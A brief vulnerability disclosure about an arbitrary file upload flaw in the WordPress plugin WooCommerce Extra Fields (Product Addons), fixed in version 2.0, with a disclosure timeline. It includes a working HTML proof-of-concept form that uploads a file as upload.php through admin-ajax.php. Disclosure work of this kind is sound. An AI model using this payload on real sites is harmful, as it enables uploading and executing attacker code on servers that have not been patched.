After discovering an arbitrary file upload vulnerability in the plugin N-Media Post Front-end Form recently, we took a look at other plugins from the same developer and found that three other shared same the same vulnerable code. One of those was WooCommerce Extra Fields (which has now been renamed WooCommerce Product Addons).
The vulnerability was subsequently fixed in version 2.0.
Proof of Concept
The following proof of concept will upload the selected file to the directory /wp-content/uploads/product_files/ as upload.php. WooCommerce needs to be enabled for this to work.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="nm_personalizedproduct_upload_file" /> <input type="hidden" name="name" value="upload.php" /> <input type="file" name="file" /> <input type="submit" value="Submit request" /> </form> </body> </html>
- 7/16/2016 – Developer notified.
- 7/16/2016 – Developer responds.
- 8/2/2016 – Version 2.0 released, which fixes vulnerability.